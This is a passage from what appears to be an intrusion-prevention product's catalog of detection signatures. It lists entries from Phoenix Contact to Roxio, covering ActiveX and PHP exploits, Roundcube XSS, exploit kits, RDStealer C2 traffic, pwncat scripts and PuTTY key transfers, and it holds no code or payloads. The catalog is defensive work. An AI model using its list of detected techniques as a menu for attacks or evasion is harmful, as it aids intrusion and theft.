About this situation: An attempt to exploit a vulnerability in Phoenix Contact Automationworx detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Phoenix Contact Automationworx, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1270-5242
Vulnerability: Phoenix-Contact-Automationworx-Plcopen-Xml-Stack-Buffer-Overflow
Description:
Back to top

File-Text_PhotoStockPlus-Uploader-Tool-ActiveX-Control-Username-Password-BOFS

About this situation: Attempt to exploit a buffer overflow vulnerability in the PhotoStockPlus Uploader Tool ActiveX control detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, PhotoStockPlus Uploader Tool, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: HTTP-PhotoStockPlus-Uploader-Tool-ActiveX-Control-Username-Password-BOFS
Description:
Back to top

File-Text_PHP-Exception-Tostring-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-846-5242
Last changed: sgpkg-ips-846-5242
Vulnerability: PHP-Exception-Tostring-Denial-Of-Service
Description:
Back to top

File-Text_PHP-Filter-In-Link-Or-Src-Attribute

About this situation: Link beginning with a PHP filter
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1756-5242
Last changed: sgpkg-ips-1756-5242
Description:
Back to top

File-Text_Php-PECL-Zip-URL-Wrapper-Buffer-Overflow

About this situation: A long filename in PHP PECL Zip-extension was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-560-5211
Vulnerability: Php-PECL-Zip-URL-Wrapper-Buffer-Overflow
Description:
Back to top

File-Text_Php-Phar_Parse_pharfile-Function-Filename_Len-Property-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-855-5242
Last changed: sgpkg-ips-855-5242
Vulnerability: Php-Phar_Parse_pharfile-Function-Filename_Len-Property-Integer-Overflow
Description:
Back to top

File-Text_PHP-Phar_Set_inode-Function-Archive-Processing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-662-5211
Last changed: sgpkg-ips-761-5211
Vulnerability: PHP-Phar_Set_inode-Function-Archive-Processing-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Php-Probe-Script

About this situation: PHP probe script detected
Context: Text File Stream
Severity: 7
Tags: Unix, Any Hardware, Any Software, Unix not specific, Any Software not specific, Suspected Probe, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Php-Probe-Script
Description:
Back to top

File-Text_Php-Script-External-Command-Execution-Download

About this situation: An attempt to download a specific PHP script detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1258-5242
Vulnerability: Php-Script-External-Command-Execution
Description:
Back to top

File-Text_Php-Script-External-Command-Execution-Download-2

About this situation: An attempt to download a specific PHP script detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1615-5242
Vulnerability: Php-Script-External-Command-Execution
Description:
Back to top

File-Text_Php-Scripting-In-Server-Reply

About this situation: Detected PHP scripting in the server reply
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Web-Server-Side-Script-Disclosure
Description:
Back to top

File-Text_PHP-Test-Page-Transfer

About this situation: Detects a php info page
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Vulnerability: Php-Phpinfo-request
Description:
Back to top

File-Text_Php-Zend_Hash_destroy-Uninitialized-Pointer-Code-Execution

About this situation: An attempt to exploit a vulnerability in PHP detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-859-5242
Vulnerability: Php-Zend_Hash_destroy-Uninitialized-Pointer-Code-Execution
Description:
Back to top

File-Text_Phpmyadmin-Searchcontroller-SQL-Injection

About this situation: An attempt to exploit a vulnerability in phpMyAdmin Devel Team phpMyAdmin detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, phpMyAdmin, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Vulnerability: Phpmyadmin-Searchcontroller-SQL-Injection
Description:
Back to top

File-Text_PluginDetect-Script

About this situation: Usage of PluginDetect script was detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Disclosure
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1032-5242
Vulnerability: PluginDetect
Description:
Back to top

File-Text_Possible-Cross-Site-Scripting-In-Img-Tag-Src-Attribute

About this situation: Possible cross site scripting in the src attribute of an img tag
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1830-5242
Last changed: sgpkg-ips-1830-5242
Description:
Back to top

File-Text_Possible-Metasploit-Generated-Malicious-File-Detected

About this situation: A Possible Metasploit Generated Malicious File Detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1078-5242
Last changed: sgpkg-ips-1078-5242
Vulnerability: Possible-Metasploit-Generated-Malicious-File-Detected
Description:
Back to top

File-Text_Possibly-Malicious-Certificate-File

About this situation: Possibly malicious certificate file was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware
First detected in: sgpkg-ips-1097-5242
Last changed: sgpkg-ips-1097-5242
Vulnerability: Possibly-Malicious-Certificate-File
Description:
Back to top

File-Text_Possibly-Malicious-PowerShell-Commands-In-HTTP-Response

About this situation: Possibly malicious PowerShell commands
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1754-5242
Last changed: sgpkg-ips-1755-5242
Description:
Back to top

File-Text_Potential-Ghostscript-Format-String-Exploitation-CVE-2024-29510

About this situation: An attempt to exploit a vulnerability in Ghostscript detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ghostscript, CVE2024, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1750-5242
Last changed: sgpkg-ips-1750-5242
Vulnerability: Ghostscript-Format-String-Exploitation-CVE-2024-29510
Description:
Back to top

File-Text_Potential-SnakeYaml-Constructor-Insecure-Deserialization-CVE-2022-1471

About this situation: An attempt to exploit a vulnerability in SnakeYaml detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SnakeYaml, CVE2022, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1663-5242
Last changed: sgpkg-ips-1663-5242
Vulnerability: SnakeYaml-Constructor-Insecure-Deserialization-CVE-2022-1471
Description:
Back to top

File-Text_Potentially-Malicious-SYLK-File

About this situation: Potentially malicious SYLK file detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1110-5242
Vulnerability: Potentially-Malicious-SYLK-File
Description:
Back to top

File-Text_PowerShell-In-Office-Document

About this situation: References to Powershell use in Office documents detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1081-5242
Last changed: sgpkg-ips-1081-5242
Vulnerability: PowerShell-In-Office-Document
Description:
Back to top

File-Text_PPStream-ActiveX-Control-Logo-Parameter-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in PPStream ActiveX control detected
Context: Text File Stream
Severity: 10
Tags: Windows, x86, PPStream, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-630-5211
Vulnerability: PPStream-ActiveX-Control-Logo-Parameter-Buffer-Overflow
Description:
Back to top

File-Text_Progress-WhatsUp-Gold-AppProfileImport-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in Progress WhatsUp Gold detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Progress WhatsUp Gold, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1770-5242
Last changed: sgpkg-ips-1771-5242
Vulnerability: Progress-WhatsUp-Gold-AppProfileImport-Unrestricted-File-Upload
Description:
Back to top

File-Text_PTC-IsoView-ActiveX-Control-Multiple-Methods-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in PTC Arbortext IsoView detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PTC Arbortext IsoView, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-637-5211
Vulnerability: PTC-IsoView-ActiveX-Control-Multiple-Methods-Buffer-Overflow
Description:
Back to top

File-Text_PTC-IsoView-ActiveX-Control-ViewPort-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in PTC Arbortext IsoView detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PTC Arbortext IsoView, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: PTC-IsoWiew-ActiveX-Control-ViewPort-Heap-Buffer-Overflow
Description:
Back to top

File-Text_Pulse-Secure-Cross_Site_Script_Inclusion

About this situation: An attempt to exploit a vulnerability in Pulse Connect Secure detected
Context: Text File Stream
Severity: 7
Tags: Pulse Secure, Any Hardware, CVE2019, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1193-5242
Last changed: sgpkg-ips-1193-5242
Vulnerability: Pulse-Secure-Cross_Site_Script_Inclusion
Description:
Back to top

File-Text_PurpleFox-EK-Exploit-Redirect-Page

About this situation: PurpleFox Exploit Kit traffic was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Vulnerability: PurpleFox-EK-Exploit-Redirect-Page
Description:
Back to top

File-Text_PuTTY-User-Key-PPK-File-Transfer

About this situation: A PuTTY user key (.ppk) file transfer detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1751-5242
Last changed: sgpkg-ips-1751-5242
Description:
Back to top

File-Text_pwncat-Script

About this situation: pwncat script was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1252-5242
Vulnerability: pwncat-Traffic
Description:
Back to top

File-Text_Python-Rot13-File-Encoding

About this situation: Detected Rot13 encoding inside Python source file
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Python, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-636-5211
Vulnerability: Python-Rot13-File-Encoding
Description:
Back to top

File-Text_Python-Script-With-Base64-Obfuscation-Pattern

About this situation: A potentially malicious Python script detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1716-5242
Vulnerability: Python-Script-With-Base64-Obfuscation-Pattern
Description:
Back to top

File-Text_Quest-Intrust-Annotation-Objects-ActiveX-Control-Index-Out-Of-Bounds

About this situation: An attempt to exploit a vulnerability in Quest Software InTrust detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Quest Software InTrust, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-632-5211
Vulnerability: Quest-Intrust-Annotation-Objects-ActiveX-Control-Index-Out-Of-Bounds
Description:
Back to top

File-Text_Quest-NetVault-Backup-Export-Arbitrary-File-Overwrite

About this situation: An attempt to exploit a vulnerability in Quest Software NetVault Backup detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Quest Software NetVault Backup, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1038-5242
Vulnerability: Quest-NetVault-Backup-Export-Arbitrary-File-Overwrite
Description:
Back to top

File-Text_QZX-Obfuscated-JavaScript-Detected

About this situation: Obfuscated JavaScript Detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1162-5242
Last changed: sgpkg-ips-1260-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_QZX-Obfuscated-Malicious-JavaScript-Detected

About this situation: Obfuscated JavaScript Detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1262-5242
Last changed: sgpkg-ips-1382-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_QZX-Obfuscated-Malicious-JavaScript-Detected-2

About this situation: Obfuscated JavaScript Detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1382-5242
Last changed: sgpkg-ips-1382-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_RDP-ActiveX-Control-Remote-Code-Execution-Vulnerability

About this situation: Attack against a ActiveX RDP component
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2013-04, CVE2013, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-519-5211
Last changed: sgpkg-ips-519-5211
Vulnerability: RDP-ActiveX-Control-Remote-Code-Execution-Vulnerability
Description:
Back to top

File-Text_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-2

About this situation: RDS.Dataspace ActiveX Control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Data Access Components, MS2006-04, CVE2006, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-448-4219
Vulnerability: RDS.Dataspace-ActiveX-Control-Remote-Code-Execution
Description:
Back to top

File-Text_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-3

About this situation: RDS.Dataspace ActiveX Control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Data Access Components, MS2006-04, CVE2006, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-637-5211
Vulnerability: RDS.Dataspace-ActiveX-Control-Remote-Code-Execution
Description:
Back to top

File-Text_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-4

About this situation: RDS.Dataspace ActiveX Control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Data Access Components, MS2006-04, CVE2006, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-582-5211
Last changed: sgpkg-ips-667-5211
Vulnerability: RDS.Dataspace-ActiveX-Control-Remote-Code-Execution
Description:
Back to top

File-Text_RDStealer-Malware-C2-Traffic

About this situation: Command-and-control traffic by RDStealer malware detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RDStealer Malware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1604-5242
Last changed: sgpkg-ips-1604-5242
Vulnerability: RDStealer-Malware-C2-Traffic
Description:
Back to top

File-Text_RealNetworks-RealGames-StubbyUtil-ProcessMgr-ActiveX-Command-Execution

About this situation: Detected attempt to exploit a vulnerability in RealNetworks RealGames
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, RealNetworks RealGames, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: RealNetworks-RealGames-StubbyUtil-ProcessMgr-ActiveX-Command-Execution
Description:
Back to top

File-Text_RealNetworks-RealPlayer-ActiveX-Import-Method-Buffer-Overflow

About this situation: Detects buffer overflow exploits against the RealNetworks RealPlayer ActiveX control
Context: Text File Stream
Severity: 10
Tags: Windows, x86, RealPlayer, CVE2008, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-637-5211
Vulnerability: RealNetworks-RealPlayer-ActiveX-Import-Method-Buffer-Overflow
Description:
Back to top

File-Text_RealNetworks-RealPlayer-CDDA-URI-Uninitialized-Pointer-Code-Execution

About this situation: An attempt to exploit a vulnerability in RealNetworks Realplayer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, RealPlayer, RealPlayer SP, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: RealNetworks-RealPlayer-CDDA-URI-Uninitialized-Pointer-Code-Execution
Description:
Back to top

File-Text_RealNetworks-RealPlayer-Playlist-Handling-Exploit

About this situation: Detected an exploit attempt against RealPlayer ActiveX component
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, RealPlayer, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: RealNetworks-RealPlayer-Playlist-Handling-Buffer-Overflow
Description:
Back to top

File-Text_RealNetworks-RealPlayer-RecordClip-Parameter-Injection

About this situation: An attempt to exploit a vulnerability in RealNetworks RealPlayer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, RealPlayer, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: RealNetworks-RealPlayer-RecordClip-Parameter-Injection
Description:
Back to top

File-Text_RealNetworks-RealPlayer-rmoc3260.dll-ActiveX-Control-Memory-Corruption

About this situation: An attempt to exploit memory corruption vulnerability in RealNetworks' RealPlayer detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, RealPlayer, CVE2008, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-988-5242
Vulnerability: RealNetworks-RealPlayer-rmoc3260.dll-ActiveX-Control-Memory-Corruption
Description:
Back to top

File-Text_RealNetworks-RealPlayer-Rmp-File-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in RealNetworks RealPlayer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RealPlayer, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-558-5211
Vulnerability: RealNetworks-RealPlayer-Rmp-File-Heap-Buffer-Overflow
Description:
Back to top

File-Text_RealPlayer-RAM-File-Processing-Buffer-Overflow

About this situation: Detects buffer overflow exploits against Realplayer
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RealPlayer, RealOne Player, Helix Player, CVE2005, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-RealPlayer-RAM-File-Processing-Buffer-Overflow
Description:
Back to top

File-Text_RealPlayer-Realpix-And-Realtext-Format-String-Compromise

About this situation: Attempt to exploit RealPlayer format string vulnerability
Context: Text File Stream
Severity: 7
Tags: Unix, Any Hardware, RealPlayer, CVE2005, Unix not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-RealPlayer-Realpix-And-Realtext-Format-String-Compromise
Description:
Back to top

File-Text_RealPlayer-Url-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in RealPlayer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, RealPlayer, CVE2004, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-452-4333
Vulnerability: RealPlayer-Url-Parsing-Buffer-Overflow
Description:
Back to top

File-Text_RealPlayer-Vulnerable-Embedded-ActiveX-Control

About this situation: Vulnerable ActiveX Control
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, RealPlayer, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: RealNetworks-RealPlayer-Ivr-Handling-Heap-Buffer-Overflow
Description:
Back to top

File-Text_Red-Lion-Crimson-CD3-Itemindexlist-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Red Lion Crimson detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Red Lion Crimson, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1211-5242
Last changed: sgpkg-ips-1503-5242
Vulnerability: Red-Lion-Crimson-CD3-Itemindexlist-Type-Confusion
Description:
Back to top

File-Text_Red-Lion-Crimson-CD3-Port-List-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Red Lion Crimson detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Red Lion Crimson, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1253-5242
Vulnerability: Red-Lion-Crimson-CD3-Port-List-Type-Confusion
Description:
Back to top

File-Text_Reference-To-Local-Path

About this situation: A HTML document refers to a local file or path
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-800-5242
Description:
Back to top

File-Text_Remote-VBScript-Loaded

About this situation: A VBScript loads another VBScript
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1128-5242
Description:
Back to top

File-Text_Reverse-Obfuscated-Script

About this situation: Obfuscated Script detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-870-5242
Last changed: sgpkg-ips-870-5242
Vulnerability: JavaScript-Obfuscation
VBScript-Scripting-Detected
Description:
Back to top

File-Text_RIG-EK-Lander-Script

About this situation: Traffic resembling RIG Exploit Kit was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-927-5242
Last changed: sgpkg-ips-927-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Text_Rising-Online-Virus-Scanner-ActiveX-Control-Denial-Of-Service

About this situation: An attempt exploit a vulnerability in Rising Online Virus Scanner detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Rising Online Virus Scanner, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-590-5211
Description:
Back to top

File-Text_RKD-Software-BarCodeAx.dll-Buffer-Overflow

About this situation: An attempt exploit an RKD Software BarCodeAx.dll Buffer Overflow vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Windows XP, Any Hardware, RKD Software, CVE2007, Windows XP not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-732-5211
Last changed: sgpkg-ips-734-5211
Vulnerability: RKD-Software-BarCodeAx.dll-Buffer-Overflow
Description:
Back to top

File-Text_Roundcube-Webmail-Cascading-Style-Sheets-Filtering-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in RoundCube RoundCube Webmail detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RoundCube Webmail, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1790-5242
Last changed: sgpkg-ips-1790-5242
Vulnerability: Roundcube-Webmail-Cascading-Style-Sheets-Filtering-Information-Disclosure
Description:
Back to top

File-Text_Roundcube-Webmail-Cross-Site-Scripting-CVE-2020-35730

About this situation: An attempt to exploit a vulnerability in RoundCube Webmail detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RoundCube Webmail, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1677-5242
Last changed: sgpkg-ips-1677-5242
Vulnerability: Roundcube-Webmail-Cross-Site-Scripting-CVE-2020-35730
Description:
Back to top

File-Text_Roundcube-Webmail-Html4inline-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in RoundCube RoundCube Webmail detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RoundCube Webmail, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1779-5242
Last changed: sgpkg-ips-1779-5242
Vulnerability: Roundcube-Webmail-Html4inline-Stored-Cross-Site-Scripting
Description:
Back to top

File-Text_Roundcube-Webmail-Inline-Attachment-View-Stored-XSS-CVE-2024-42008

About this situation: An attempt to exploit a vulnerability in RoundCube Webmail detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RoundCube Webmail, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1789-5242
Last changed: sgpkg-ips-1789-5242
Vulnerability: Roundcube-Webmail-Inline-Attachment-View-Stored-XSS-CVE-2024-42008
Description:
Back to top

File-Text_Roundcube-Webmail-Linkref-Cross-Site-Scripting-CVE-2023-43770

About this situation: An attempt to exploit a vulnerability in RoundCube Webmail detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RoundCube Webmail, CVE2023, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1820-5242
Last changed: sgpkg-ips-1820-5242
Vulnerability: Roundcube-Webmail-Linkref-Cross-Site-Scripting-CVE-2023-43770
Description:
Back to top

File-Text_Roundcube-Webmail-XML-Attachment-Cross-Site-Scripting-CVE-2020-13965

About this situation: An attempt to exploit a vulnerability in RoundCube Webmail detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RoundCube Webmail, CVE2020, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1816-5242
Last changed: sgpkg-ips-1829-5242
Vulnerability: Roundcube-Webmail-XML-Attachment-Cross-Site-Scripting-CVE-2020-13965
Description:
Back to top

File-Text_Roxio-CinePlayer-Buffer-Overflow

